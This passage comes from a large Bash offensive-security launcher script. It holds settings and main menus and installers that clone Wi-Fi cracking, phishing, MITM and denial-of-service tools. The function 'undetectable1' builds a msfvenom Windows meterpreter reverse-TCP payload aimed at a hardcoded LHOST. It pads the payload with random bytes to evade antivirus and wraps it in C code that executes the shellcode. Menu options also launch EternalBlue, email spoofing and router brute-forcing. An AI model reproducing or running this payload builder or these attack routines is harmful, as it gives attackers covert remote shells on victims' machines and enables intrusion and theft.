8935 #if inter=1 then error
8936 fi
8937 done
8938}
8939function settings_menu
8940{
8941 if [[ ! -d "$LPATH"/settings ]]
8942 then
8943 mkdir "$LPATH"/settings
8944 fi
8945 clear
8946 while true
8947 do
8948 clear
8949 TERMINALTITLE="SETTINGS"
8950 dash_calc
8951 printf '\033]2;SETTINGS\a'
8952 if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
8953 then
8954 read ALFA < "$LPATH"/settings/AWUS036ACH.txt
8955 else
8956 ALFA="no"
8957 fi
8958 if [[ -f "$LPATH"/settings/startmac.txt ]]
8959 then
8960 read STARTMAC < "$LPATH"/settings/startmac.txt
8961 else
8962 STARTMAC="00:11:22:33:44:55"
8963 fi
8964 if [[ -f "$LPATH"/settings/ignorenegativeone.txt ]]
8965 then
8966 read IGN < "$LPATH"/settings/ignorenegativeone.txt
8967 else
8968 IGN="no"
8969 fi
8970 if [[ -f "$LPATH"/settings/arpin.txt ]]
8971 then
8972 read ARPIN < "$LPATH"/settings/arpin.txt
8973 else
8974 ARPIN="$WLANN"
8975 fi
8976 echo -e ""$YS" 1"$CE") Change logo color"
8977 echo -e ""$YS" 2"$CE") Howdoi settings"
8978 echo -e ""$YS" 3"$CE") ALFA AWUS036ACH support $ALFA"
8979 echo -e ""$YS" 4"$CE") Ignore negative one when deauthing $IGN"
8980 echo -e ""$YS" 5"$CE") MAC to change to,when starting monitor $STARTMAC"
8981 echo -e ""$YS" 6"$CE") Interface for arp-scan $ARPIN"
8982 echo -e ""$YS" 7"$CE") Interface for iftop(show bandwidth) $iftopint"
8983 echo -e ""$YS" b"$CE") Go back"
8984 echo -e ""$YS" 0"$CE") Exit"
8985 echo -e "Choose: "
8986 read SET
8987 clear
8988 if [[ "$SET" = "back" || "$SET" = "b" || "$SET" = "00" ]]
8989 then
8990 BACKL=1
8991 break
8992 elif [[ "$SET" = 0 ]]
8993 then
8994 exit
8995 elif [[ "$SET" = 7 ]]
8996 then
8997 clear
8998 echo -e ""$BS"Interface to be used for iftop: "$CE""
8999 read IFTOP
9000 IFTOPTEST=$(ifconfig | grep "$IFTOP")
9001 if [[ "$IFTOPTEST" = "" ]]
9002 then
9003 echo -e ""$RS""$IFTOP" is not currently available."$CE""
9004 echo -e "Do you still want to use $IFTOP for iftop?"$YNYES""
9005 read STARP
9006 if [[ "$STARP" = "n" ]]
9007 then
9008 IFTOP=""
9009 continue
9010 fi
9011 fi
9012 echo -e "$IFTOP" > "$LPATH"/settings/iftopint.txt
9013 elif [[ "$SET" = 6 ]]
9014 then
9015 clear
9016 echo -e ""$BS"Interface to be used for arp-scan: "$CE""
9017 read ARPIN
9018 ARPINTEST=$(ifconfig | grep "$ARPIN")
9019 if [[ "$ARPINTEST" = "" ]]
9020 then
9021 echo -e ""$RS""$ARPIN" is not currently available."$CE""
9022 echo -e "Do you still want to use $ARPIN for arp-scan?"$YNYES""
9023 read STARP
9024 if [[ "$STARP" = "n" ]]
9025 then
9026 ARPIN=""
9027 continue
9028 fi
9029 fi
9030 echo -e "$ARPIN" > "$LPATH"/settings/arpin.txt
9031 elif [[ "$SET" = 5 ]]
9032 then
9033 clear
9034 echo -e "Type new MAC("$YS"Enter"$CE"="$DEFMAC"): "
9035 read NEWMAC
9036 if [[ "$NEWMAC" = "" ]]
9037 then
9038 echo "$DEFMAC" > "$LPATH"/settings/startmac.txt
9039 else
9040 sizemac=${#NEWMAC}
9041 if [[ "$sizemac" != 17 ]]
9042 then
9043 echo -e ""$RS"Invalid MAC. Setting it back to default"$CE""
9044 sleep 4
9045 else
9046 echo $NEWMAC > "$LPATH"/settings/startmac.txt
9047 fi
9048 fi
9049 elif [[ "$SET" = 4 ]]
9050 then
9051 if [[ "$IGN" = "yes" ]]
9052 then
9053 IGN="no"
9054 else
9055 IGN="yes"
9056 fi
9057 echo -e "$IGN" > "$LPATH"/settings/ignorenegativeone.txt
9058 elif [[ "$SET" = 3 ]]
9059 then
9060 if [[ "$ALFA" = "yes" ]]
9061 then
9062 ALFA="no"
9063 else
9064 ALFA="yes"
9065 fi
9066 echo -e "$ALFA" > "$LPATH"/settings/AWUS036ACH.txt
9067 elif [[ "$SET" = 2 ]]
9068 then
9069 while true
9070 do
9071 clear
9072 if [[ -f "$LPATH"/settings/dispfull.txt ]]
9073 then
9074 read dispfull < "$LPATH"/settings/dispfull.txt
9075 else
9076 dispfull="false"
9077 fi
9078 if [[ -f "$LPATH"/settings/colorout.txt ]]
9079 then
9080 read colorout < "$LPATH"/settings/colorout.txt
9081 else
9082 colorout="false"
9083 fi
9084 if [[ -f "$LPATH"/settings/onlylink.txt ]]
9085 then
9086 read onlylink < "$LPATH"/settings/onlylink.txt
9087 else
9088 onlylink="false"
9089 fi
9090 if [[ -f "$LPATH"/settings/numofans.txt ]]
9091 then
9092 read numofans < "$LPATH"/settings/numofans.txt
9093 else
9094 numofans="1"
9095 fi
9096 echo -e ""$YS" 1"$CE") Display the full answer text "$dispfull""
9097 echo -e ""$YS" 2"$CE") Colorized output "$colorout""
9098 echo -e ""$YS" 3"$CE") Display only the answer link "$onlylink""
9099 echo -e ""$YS" 4"$CE") Number of answers to return "$numofans""
9100 echo -e ""$YS" 5"$CE") Clear the cache"
9101 echo -e ""$YS" b"$CE") Go back"
9102 echo -e "Choose: "
9103 read HOWCH
9104 if [[ "$HOWCH" = 1 ]]
9105 then
9106 if [[ "$dispfull" = "false" ]]
9107 then
9108 dispfull="true"
9109 else
9110 dispfull="false"
9111 fi
9112 echo "$dispfull" > "$LPATH"/settings/dispfull.txt
9113 elif [[ "$HOWCH" = 2 ]]
9114 then
9115 if [[ "$colorout" = "false" ]]
9116 then
9117 colorout="true"
9118 else
9119 colorout="false"
9120 fi
9121 echo "$colorout" > "$LPATH"/settings/colorout.txt
9122 elif [[ "$HOWCH" = 3 ]]
9123 then
9124 if [[ "$onlylink" = "false" ]]
9125 then
9126 onlylink="true"
9127 else
9128 onlylink="false"
9129 fi
9130 echo "$onlylink" > "$LPATH"/settings/onlylink.txt
9131 elif [[ "$HOWCH" = 4 ]]
9132 then
9133 echo -e "Type number of answers to return: "
9134 read numofans
9135 echo "$numofans" > "$LPATH"/settings/numofans.txt
9136 elif [[ "$HOWCH" = 5 ]]
9137 then
9138 howdoi -C
9139 elif [[ "$HOWCH" = "b" || "$HOWCH" = "back" ]]
9140 then
9141 break
9142 elif [[ "$HOWCH" = 00 ]]
9143 then
9144 exec bash $0
9145 elif [[ "$HOWCH" = 0 ]]
9146 then
9147 exit
9148 fi
9149 done
9150 elif [[ "$SET" = 1 ]]
9151 then
9152 TERMINALTITLE="LOGO COLORS"
9153 dash_calc
9154 echo -e ""$YS" 1"$CE") Light Red (default) "$RS"SAMPLE"$CE""
9155 echo -e ""$YS" 2"$CE") Red "$DRS"SAMPLE"$CE""
9156 echo -e ""$YS" 3"$CE") Light Purple "$LPS"SAMPLE"$CE""
9157 echo -e ""$YS" 4"$CE") Purple "$PS"SAMPLE"$CE""
9158 echo -e ""$YS" 5"$CE") Light Green "$LGNS"SAMPLE"$CE""
9159 echo -e ""$YS" 6"$CE") Green "$GNS"SAMPLE"$CE""
9160 echo -e ""$YS" 7"$CE") Light Cyan "$LCYS"SAMPLE"$CE""
9161 echo -e ""$YS" 8"$CE") Cyan "$CYS"SAMPLE"$CE""
9162 echo -e ""$YS" 9"$CE") Light Blue "$LBS"SAMPLE"$CE""
9163 echo -e ""$YS"10"$CE") Blue "$BS"SAMPLE"$CE""
9164 echo -e ""$YS"11"$CE") Light Gray "$LGYS"SAMPLE"$CE""
9165 echo -e ""$YS"12"$CE") Dark Gray "$DGYS"SAMPLE"$CE""
9166 echo -e ""$YS"13"$CE") Yellow "$YS"SAMPLE"$CE""
9167 echo -e ""$YS"14"$CE") Brown "$BRS"SAMPLE"$CE""
9168 echo -e ""$YS"15"$CE") White "$WHS"SAMPLE"$CE""
9169 echo -e ""$YS"16"$CE") Black "$BLS"SAMPLE"$CE""
9170 echo -e "Choose: "
9171 read LC
9172 if [[ "$LC" = 1 ]]
9173 then
9174 echo -e "\e[1;31m" > "$LPATH"/settings/logocolor.txt
9175 elif [[ "$LC" = 2 ]]
9176 then
9177 echo -e "\e[0;31m" > "$LPATH"/settings/logocolor.txt
9178 elif [[ "$LC" = 3 ]]
9179 then
9180 echo -e "\e[1;35m" > "$LPATH"/settings/logocolor.txt
9181 elif [[ "$LC" = 4 ]]
9182 then
9183 echo -e "\e[0;35m" > "$LPATH"/settings/logocolor.txt
9184 elif [[ "$LC" = 5 ]]
9185 then
9186 echo -e "\e[1;32m" > "$LPATH"/settings/logocolor.txt
9187 elif [[ "$LC" = 6 ]]
9188 then
9189 echo -e "\e[0;32m" > "$LPATH"/settings/logocolor.txt
9190 elif [[ "$LC" = 7 ]]
9191 then
9192 echo -e "\e[1;36m" > "$LPATH"/settings/logocolor.txt
9193 elif [[ "$LC" = 8 ]]
9194 then
9195 echo -e "\e[0;36m" > "$LPATH"/settings/logocolor.txt
9196 elif [[ "$LC" = 9 ]]
9197 then
9198 echo -e "\e[1;34m" > "$LPATH"/settings/logocolor.txt
9199 elif [[ "$LC" = 10 ]]
9200 then
9201 echo -e "\e[0;34m" > "$LPATH"/settings/logocolor.txt
9202 elif [[ "$LC" = 11 ]]
9203 then
9204 echo -e "\e[0;37m" > "$LPATH"/settings/logocolor.txt
9205 elif [[ "$LC" = 12 ]]
9206 then
9207 echo -e "\e[1;30m" > "$LPATH"/settings/logocolor.txt
9208 elif [[ "$LC" = 13 ]]
9209 then
9210 echo -e "\e[1;33m" > "$LPATH"/settings/logocolor.txt
9211 elif [[ "$LC" = 14 ]]
9212 then
9213 echo -e "\e[0;33m" > "$LPATH"/settings/logocolor.txt
9214 elif [[ "$LC" = 15 ]]
9215 then
9216 echo -e "\e[1;37m" > "$LPATH"/settings/logocolor.txt
9217 elif [[ "$LC" = 16 ]]
9218 then
9219 echo -e "\e[0;30m" > "$LPATH"/settings/logocolor.txt
9220 fi
9221 fi
9222 done
9223}
9224function undetectable1
9225{
9226 LHOST=192.168.1.104
9227 LPORT=4444
9228 DIRECTORY="/root/Desktop/shellcode.txt"
9229 TXT="/root/Desktop/txt.txt"
9230 #############
9231 randomshit=$(cat /dev/urandom | tr -dc a-z-A-Z-0-9 | head -c1409)
9232 msfvenom -p windows/meterpreter/reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f c -o "$DIRECTORY"
9233 echo "unsigned char padding[]=" > "$TXT"
9234 echo "\"$randomshit\";" >> "$TXT"
9235 cat "$DIRECTORY" >> "$TXT"
9236 echo "int main(void) { ((void (*)())buf)();}" >> "$TXT"
9237 leafpad "$TXT"
9238}
9239function main_options
9240{
9241 if [[ "$YORNAA" = "0" ]]
9242 then
9243 exit
9244 elif [[ "$YORNAA" = "gate" || "$YORNAA" = "gateway" ]]
9245 then
9246 TT=$(ifconfig | grep "$WLANN")
9247 if [[ "$TT" = "" ]]
9248 then
9249 echo -e ""$RS""$WLANN" is not available"$CE""
9250 sleep 2
9251 else
9252 GATE=$(find_gateways "$WLANN" interface)
9253 TTT=$(is_it_an_ip "$GATE")
9254 if [[ "$TTT" != 1 ]]
9255 then
9256 echo -e ""$RS"Couldn't find your gateway."$CE""
9257 sleep 2
9258 echo -e ""$RS"Make sure you are connected to a network"$CE""
9259 sleep 2
9260 else
9261 echo -e ""$YS"Gateway found: "$GATE""$CE""
9262 sleep 1
9263 xdg-open http://"$GATE"
9264 BACKL=1
9265 fi
9266 fi
9267 elif [[ "$YORNAA" = "scan" ]]
9268 then
9269 if [[ ! -f /usr/bin/arp-scan && ! -f /usr/sbin/arp-scan ]]
9270 then
9271 echo -e ""$BS"Installing arp-scan"$CE""
9272 install_arp_scan
9273 clear
9274 fi
9275 if [[ -f "$LPATH"/settings/arpin.txt ]]
9276 then
9277 read ARPIN < "$LPATH"/settings/arpin.txt
9278 else
9279 ARPIN="$WLANN"
9280 fi
9281 if [[ "$ARPIN" = "" ]]
9282 then
9283 ARPIN="$WLANN"
9284 fi
9285 TESTARP=$(ifconfig | grep "$ARPIN")
9286 if [[ "$TESTARP" = "" ]]
9287 then
9288 clear
9289 echo -e ""$RS"$ARPIN was not found"$CE""
9290 sleep 2
9291 BACKL=1
9292 else
9293 ip_scan $ARPIN 2
9294 fi
9295 elif [[ "$YORNAA" = "22" ]]
9296 then
9297 IFTOPT=$(which iftop)
9298 if [[ "$IFTOPT" == "" ]]
9299 then
9300 apt-get -y install iftop
9301 fi
9302 CHECK=$(ifconfig | grep "$iftopint")
9303 if [[ "$CHECK" = "" ]]
9304 then
9305 echo -e ""$RS"Interface "$iftopint" was not found"
9306 sleep 2
9307 else
9308 xterm -hold -T "Iftop on $iftopint" -e "iftop -n -i $iftopint -b" & disown
9309 BACKL=1
9310 fi
9311 elif [[ "$YORNAA" = "21" ]]
9312 then
9313 sqlmap_menu
9314 elif [[ "$YORNAA" = "19" ]]
9315 then
9316 echo -e ""$BS"IP:"$CE" "
9317 read IPG
9318 clear
9319 geolocate_ip "$IPG"
9320 elif [[ "$YORNAA" = "18" ]]
9321 then
9322 browser_exploiting
9323 elif [[ "$YORNAA" = "m" ]]
9324 then
9325 mitmf_hook
9326 elif [[ "$YORNAA" = "g" ]]
9327 then
9328 find_gateways
9329 elif [[ "$YORNAA" = "l" ]]
9330 then
9331 local_ips
9332 elif [[ "$YORNAA" = "17" ]]
9333 then
9334 if [[ ! -f "/usr/local/bin/howdoi" ]]
9335 then
9336 echo -e ""$RS"Howdoi is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9337 read INSTALL
9338 if [[ "$INSTALL" = "install" ]]
9339 then
9340 install_howdoi
9341 fi
9342 else
9343 clear
9344 if [[ -f "$LPATH"/settings/dispfull.txt ]]
9345 then
9346 read dispfull < "$LPATH"/settings/dispfull.txt
9347 if [[ "$dispfull" = "true" ]]
9348 then
9349 df="-a"
9350 fi
9351 else
9352 df=""
9353 fi
9354 if [[ -f "$LPATH"/settings/colorout.txt ]]
9355 then
9356 read colorout < "$LPATH"/settings/colorout.txt
9357 if [[ "$colorout" = "true" ]]
9358 then
9359 co="-c"
9360 fi
9361 else
9362 co=""
9363 fi
9364 if [[ -f "$LPATH"/settings/onlylink.txt ]]
9365 then
9366 read onlylink < "$LPATH"/settings/onlylink.txt
9367 if [[ "$onlylink" = "true" ]]
9368 then
9369 ol="-l"
9370 fi
9371 else
9372 ol=""
9373 fi
9374 if [[ -f "$LPATH"/settings/numofans.txt ]]
9375 then
9376 read numofans < "$LPATH"/settings/numofans.txt
9377 if [[ "$numofans" = "true" ]]
9378 then
9379 na="-n "$numofans""
9380 fi
9381 else
9382 na=""
9383 fi
9384 echo -e "How do i : "
9385 read HOW
9386 howdoi $co $na $ol $df $HOW
9387 fi
9388 elif [[ "$YORNAA" = "settings" || "$YORNAA" = "s" ]]
9389 then
9390 settings_menu
9391 elif [[ "$YORNAA" = "16" ]]
9392 then
9393 ngrok_option
9394 BACKL=1
9395 elif [[ "$YORNAA" = "donate" || "$YORNAA" = "d" ]]
9396 then
9397 donate_option
9398#------services
9399 elif [[ "$YORNAA" = "pstart" ]]
9400 then
9401 service postgresql start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9402 elif [[ "$YORNAA" = "pstop" ]]
9403 then
9404 service postgresql stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9405 elif [[ "$YORNAA" = "nstart" ]]
9406 then
9407 service NetworkManager start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9408 elif [[ "$YORNAA" = "nstop" ]]
9409 then
9410 service NetworkManager stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9411 elif [[ "$YORNAA" = "astart" ]]
9412 then
9413 service apache2 start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9414 elif [[ "$YORNAA" = "astop" ]]
9415 then
9416 service apache2 stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9417 elif [[ "$YORNAA" = "nessusstart" ]]
9418 then
9419 if [[ -f /etc/init.d/nessusd ]]
9420 then
9421 /etc/init.d/nessusd start && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9422 else
9423 echo -e ""$RS"Nessus is not already installed."$CE""
9424 sleep 2
9425 fi
9426 elif [[ "$YORNAA" = "nessusstop" ]]
9427 then
9428 if [[ -f /etc/init.d/nessusd ]]
9429 then
9430 /etc/init.d/nessusd stop && echo -e ""$YS"Done"$CE"" || echo -e ""$RS"Error"$CE""
9431 else
9432 echo -e ""$RS"Nessus is not already installed."$CE""
9433 sleep 2
9434 fi
9435#-------------
9436 elif [[ "$YORNAA" = "15" ]]
9437 then
9438 BACKL="1"
9439 spoof_email
9440 elif [[ "$YORNAA" = "ks" ]]
9441 then
9442 keyboard_shortcuts
9443 elif [[ "$YORNAA" = "interface" ]]
9444 then
9445 interface_menu
9446 elif [[ "$YORNAA" = "9" ]]
9447 then
9448 tools_menu
9449 elif [[ "$YORNAA" = "l" ]]
9450 then
9451 clear
9452 exec bash "$0"
9453 elif [[ "$YORNAA" = "gg" ]]
9454 then
9455 geany /bin/lscript/l
9456 elif [[ "$YORNAA" = "1" ]]
9457 then
9458 enable_wlan
9459 elif [[ "$YORNAA" = "d1" ]]
9460 then
9461 check_wlans
9462 if [[ "$WLANCHECKING" = "" ]]
9463 then
9464 echo -e ""$RS"Error. Could find $WLANN interface to disable."$CE""
9465 else
9466 disable_wlan
9467 fi
9468 elif [[ "$YORNAA" = "2" ]]
9469 then
9470 check_wlans
9471 if [[ "$WLANCHECKING" = "" ]]
9472 then
9473 echo -e ""$RS"Error. Could find $WLANN interface."$CE""
9474 else
9475 echo -e "Enabling $WLANNM..."
9476 echo -e "Killing services..."
9477 (airmon-ng check kill &> /dev/null && echo -e "Done." ) || echo -e ""$RS"Error killing services"$YS""
9478 echo -e "Starting monitor mode..."
9479 (airmon-ng start $WLANN &>/dev/null && echo -e "Done" ) || echo -e "Error starting monitor mode."
9480 fi
9481 elif [[ "$YORNAA" = "d2" ]]
9482 then
9483 check_wlans
9484 if [[ "$WLANMCHECKING" = "" ]]
9485 then
9486 echo -e ""$RS"Error. Could find $WLANNM interface."$CE""
9487 else
9488 stop_monitor
9489 fi
9490 elif [[ "$YORNAA" = "3" ]]
9491 then
9492 change_mac
9493 elif [[ "$YORNAA" = "d3" ]]
9494 then
9495 interface_selection
9496 clear
9497 echo -e "Changing mac address of $MYINT to the original one..."
9498 ifconfig $MYINT down
9499 macchanger -p $MYINT
9500 ifconfig $MYINT up
9501 echo -e "Done."
9502 elif [[ "$YORNAA" = "4" ]]
9503 then
9504 if [[ ! -f "/etc/init.d/anonym8.sh" ]]
9505 then
9506 echo -e ""$RS"Anonym8 is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9507 read INSTALL
9508 if [[ "$INSTALL" = "install" ]]
9509 then
9510 install_anonym8
9511 fi
9512 else
9513 echo -e "Enabling anonym8..."
9514 anonym8 start
9515 echo -e "Done."
9516 fi
9517 elif [[ "$YORNAA" = "d4" ]]
9518 then
9519 if [[ ! -f "/etc/init.d/anonym8.sh" ]]
9520 then
9521 echo -e ""$RS"Anonym8 is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9522 read INSTALL
9523 if [[ "$INSTALL" = "install" ]]
9524 then
9525 install_anonym8
9526 fi
9527 else
9528 echo -e "Disabling anonym8..."
9529 anonym8 stop
9530 echo -e "Done."
9531 fi
9532 elif [[ "$YORNAA" = "5" ]]
9533 then
9534 if [[ ! -f "/usr/bin/anonsurf" ]]
9535 then
9536 echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9537 read INSTALL
9538 if [[ "$INSTALL" = "install" ]]
9539 then
9540 install_anonsurf
9541 fi
9542 else
9543 echo -e "Enabling anonsurf..."
9544 anonsurf start
9545 echo -e "Done."
9546 fi
9547 elif [[ "$YORNAA" = "d5" ]]
9548 then
9549 if [[ ! -f "/usr/bin/anonsurf" ]]
9550 then
9551 echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9552 read INSTALL
9553 if [[ "$INSTALL" = "install" ]]
9554 then
9555 install_anonsurf
9556 fi
9557 else
9558 echo -e "Disabling anonsurf..."
9559 anonsurf stop
9560 echo -e "Done."
9561 fi
9562 elif [[ "$YORNAA" = "6" ]]
9563 then
9564 if [[ ! -f "/usr/bin/anonsurf" ]]
9565 then
9566 echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9567 read INSTALL
9568 if [[ "$INSTALL" = "install" ]]
9569 then
9570 install_anonsurf
9571 fi
9572 else
9573 echo -e "Status of anonsurf..."
9574 anonsurf status
9575 echo -e "Done."
9576 fi
9577 elif [[ "$YORNAA" = "d6" ]]
9578 then
9579 if [[ ! -f "/usr/bin/anonsurf" ]]
9580 then
9581 echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9582 read INSTALL
9583 if [[ "$INSTALL" = "install" ]]
9584 then
9585 install_anonsurf
9586 fi
9587 else
9588 echo -e "Restarting anonsurf..."
9589 anonsurf change
9590 echo -e "Done."
9591 fi
9592 elif [[ "$YORNAA" = "r6" ]]
9593 then
9594 if [[ ! -f "/usr/bin/anonsurf" ]]
9595 then
9596 echo -e ""$RS"Anonsurf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
9597 read INSTALL
9598 if [[ "$INSTALL" = "install" ]]
9599 then
9600 install_anonsurf
9601 fi
9602 else
9603 echo -e "Restarting anonsurf..."
9604 anonym8 change
9605 echo -e "Done."
9606 fi
9607 elif [[ "$YORNAA" = "7" ]]
9608 then
9609 public_ip
9610 elif [[ "$YORNAA" = "8" ]]
9611 then
9612 interface_selection
9613 clear
9614 echo "Your MACs: "
9615 macchanger -s $MYINT
9616 elif [[ "$YORNAA" = "10" || "$YORNAA" = "11" || "$YORNAA" = "12" ]]
9617 then
9618 new_terminal
9619 elif [[ "$YORNAA" = "13" ]]
9620 then
9621 mitm_menu
9622 elif [[ "$YORNAA" = "14" ]]
9623 then
9624 metasploit_menu
9625 elif [[ "$YORNAA" = "20" ]]
9626 then
9627 bruteforce_router
9628 elif [[ "$YORNAA" = "exit" ]]
9629 then
9630 kill -9 $PPID
9631 exit
9632 elif [[ "$YORNAA" = "update" ]]
9633 then
9634 printf '\033]2;UPDATE\a'
9635 clear
9636 update_lscript
9637 elif [[ "$YORNAA" = "if" || "$YORNAA" = "ifconfig" ]]
9638 then
9639 ifconfig
9640 elif [[ "$YORNAA" = "changelog" ]]
9641 then
9642 clear
9643 BACKL=1
9644 cat "$LPATH"/Changelog | head -n 20
9645 echo -e "$PAKTC"
9646 $READAK
9647 clear
9648 elif [[ "$YORNAA" = "" ]]
9649 then
9650 clear
9651 exec bash "$0"
9652 elif [[ "$YORNAA" = "errors" ]]
9653 then
9654 errors_menu
9655 elif [[ "$YORNAA" = "etercheck" ]]
9656 then
9657 if [[ -d /root/wifiphisher ]]
9658 then
9659 eternalblue_check
9660 else
9661 echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
9662 read INSTALL
9663 if [[ "$INSTALL" = "install" ]]
9664 then
9665 install_wifiphisher
9666 fi
9667 fi
9668 elif [[ "$YORNAA" = "eternalblue" ]]
9669 then
9670 if [[ -d /root/wifiphisher ]]
9671 then
9672 eternalblue
9673 else
9674 echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
9675 read INSTALL
9676 if [[ "$INSTALL" = "install" ]]
9677 then
9678 install_wifiphisher
9679 fi
9680 fi
9681 elif [[ "$YORNAA" = "$wififb" ]]
9682 then
9683 if [[ -d /root/wifiphisher ]]
9684 then
9685 wififb_attack
9686 else
9687 echo -e ""$RS"Wifiphisher is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."$CE""
9688 read INSTALL
9689 if [[ "$INSTALL" = "install" ]]
9690 then
9691 install_wifiphisher
9692 fi
9693 fi
9694 elif [[ "$YORNAA" = "start" ]]
9695 then
9696 start_menu
9697#----------
9698 elif [[ "$YORNAA" = "stop" ]]
9699 then
9700 stop_menu
9701 elif [[ "$YORNAA" = "exit" ]]
9702 then
9703 clear
9704 exit
9705 fi
9706####check if it is ks
9707var1=1
9708check_if_ks
9709####
9710}
9711
9712#----------------TOOLS---------------
9713 function install_default
9714 {
9715 if [[ "$foldname" == "" ]]
9716 then
9717 testgit=$(echo "$gitlink" | grep ".git")
9718 if [[ "$testgit" == "" ]]
9719 then
9720 foldname=$(echo "$gitlink" | cut -d '/' -f5)
9721 else
9722 foldname=$(echo "$gitlink" | cut -d '/' -f2 | cut -d '.' -f1)
9723 fi
9724 fi
9725 if [[ -d "/root/"$foldname"" ]]
9726 then
9727 if [[ "$NOCONFIRM" == 1 ]]
9728 then
9729 if [[ "$foldname" != "" ]]
9730 then
9731 echo -e ""$YS"Removing: "$foldname""$CE""
9732 rm -r /root/"$foldname"
9733 cd
9734 git clone $gitlink
9735 cd "$foldname"
9736 return 1
9737 fi
9738 else
9739 echo -e ""$YS"Removing old and install again?"$CE" ("$YS"y"$CE"/"$YS"n"$CE")"
9740 read ROIN
9741 if [[ "$ROIN" == "y" ]]
9742 then
9743 if [[ "$foldname" != "" ]]
9744 then
9745 echo -e ""$YS"Removing: "$foldname""$CE""
9746 rm -r /root/"$foldname"
9747 cd
9748 git clone $gitlink
9749 cd "$foldname"
9750 return 1
9751 fi
9752 else
9753 return 0
9754 fi
9755 fi
9756 else
9757 cd
9758 git clone $gitlink
9759 cd "$foldname"
9760 return 1
9761 fi
9762 }
9763 function install_fluxion
9764 {
9765 foldname="fluxion"
9766 gitlink="--recursive https://github.com/FluxionNetwork/fluxion.git"
9767 install_default
9768 #~ wget https://fluxion.tk/fluxion-unstable.zip
9769 #~ apt-get install -y unzip
9770 #~ clear
9771 #~ unzip /root/fluxion*.zip -d /root
9772 #~ cd /root/fluxion/install
9773 #~ chmod +x install.sh
9774 #~ ./install.sh
9775 }
9776 function install_wifite
9777 {
9778 apt-get install -y wifite
9779 }
9780 function install_wifiphisher
9781 {
9782 foldname="wifiphisher"
9783 gitlink="https://github.com/wifiphisher/wifiphisher.git"
9784 install_default
9785 cloned=$?
9786 if [[ "$cloned" == 1 ]]
9787 then
9788 sudo python setup.py install
9789 fi
9790 }
9791 function install_zatacker
9792 {
9793 echo -e "I cannot install Zatacker. Please google how to do that yourself."
9794 echo -e "$PAKTGB"
9795 read
9796 }
9797 function install_morpheus
9798 {
9799 foldname="morpheus"
9800 gitlink="https://github.com/r00t-3xp10it/morpheus.git"
9801 install_default
9802 cloned=$?
9803 if [[ "$cloned" == 1 ]]
9804 then
9805 chmod +x morpheus.sh
9806 fi
9807 }
9808 function install_osrframework
9809 {
9810 pip install osrframework
9811 }
9812 function install_hakku
9813 {
9814 foldname="hakkuframework"
9815 gitlink="https://github.com/4shadoww/hakkuframework.git"
9816 install_default
9817 cloned=$?
9818 if [[ "$cloned" == 1 ]]
9819 then
9820 chmod +x hakku
9821 chmod +x install
9822 fi
9823 }
9824 function install_trity
9825 {
9826 foldname="Trity"
9827 gitlink="https://github.com/toxic-ig/Trity.git"
9828 install_default
9829 cloned=$?
9830 if [[ "$cloned" == 1 ]]
9831 then
9832 sudo python install.py
9833 fi
9834 }
9835 function install_cupp
9836 {
9837 foldname="cupp"
9838 gitlink="https://github.com/Mebus/cupp.git"
9839 install_default
9840 cloned=$?
9841 if [[ "$cloned" == 1 ]]
9842 then
9843 chmod +x cupp.py
9844 fi
9845 }
9846 function install_dracnmap
9847 {
9848 foldname="Dracnmap"
9849 gitlink="https://github.com/Screetsec/Dracnmap.git"
9850 install_default
9851 cloned=$?
9852 if [[ "$cloned" == 1 ]]
9853 then
9854 chmod +x Dracnmap.sh
9855 fi
9856 }
9857 function install_fern
9858 {
9859 if [[ -d "/root/Fern-Wifi-Cracker" ]]
9860 then
9861 echo -e "Removing old..."
9862 echo -e "$PAKTC"
9863 $READAK
9864 rm -r /root/Fern-Wifi-Cracker
9865 fi
9866 echo -e "Installing Fern"
9867 echo -e "Tool by Savio-code"
9868 sleep 1
9869 cd
9870 svn checkout http://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/
9871 cd Fern-Wifi-Cracker
9872 chmod +x execute.py
9873 }
9874 function install_kickthemout
9875 {
9876 apt-get install -y nmap
9877 foldname="kickthemout"
9878 gitlink="https://github.com/k4m4/kickthemout.git"
9879 install_default
9880 cloned=$?
9881 if [[ "$cloned" == 1 ]]
9882 then
9883 sudo python -m pip install -r requirements.txt
9884 fi
9885 }
9886 function install_ghostphisher
9887 {
9888 foldname="ghost-phisher"
9889 gitlink="https://github.com/savio-code/ghost-phisher.git"
9890 install_default
9891 cloned=$?
9892 if [[ "$cloned" == 1 ]]
9893 then
9894 chmod +x /root/ghost-phisher/Ghost-Phisher/ghost.py
9895 fi
9896 }
9897 function install_theeye
9898 {
9899 foldname="The-Eye"
9900 gitlink="https://github.com/EgeBalci/The-Eye.git"
9901 install_default
9902 cloned=$?
9903 if [[ "$cloned" == 1 ]]
9904 then
9905 chmod +x TheEye
9906 fi
9907 }
9908 function install_xerxes
9909 {
9910 foldname="xerxes"
9911 gitlink="https://github.com/zanyarjamal/xerxes.git"
9912 install_default
9913 cloned=$?
9914 if [[ "$cloned" == 1 ]]
9915 then
9916 gcc xerxes.c -o xerxes
9917 fi
9918 }
9919 function install_mdk3
9920 {
9921 foldname="mdk3-master"
